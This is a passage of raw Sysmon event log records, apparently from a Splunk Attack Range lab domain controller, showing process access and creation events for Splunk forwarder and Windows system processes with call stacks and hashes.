Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F2-5FCF-4C01-000000009101}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007709Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.882{10ACEC4A-85F2-5FCF-4C01-000000009101}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007708Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F2-5FCF-4B01-000000009101}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007707Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007706Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007705Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007704Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007703Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007702Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007701Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007700Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007699Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007698Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85F2-5FCF-4B01-000000009101}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007697Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.209{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F2-5FCF-4B01-000000009101}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007696Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:02.210{10ACEC4A-85F2-5FCF-4B01-000000009101}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000007736Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.600{10ACEC4A-85F0-5FCF-4901-000000009101}3056win-dc-9350fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000007735Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F3-5FCF-4D01-000000009101}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007734Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007733Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007732Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007731Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007730Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007729Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007728Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007727Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007726Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007725Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85F3-5FCF-4D01-000000009101}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007724Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:03.552{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F3-5FCF-4D01-000000009101}4104C:\Program 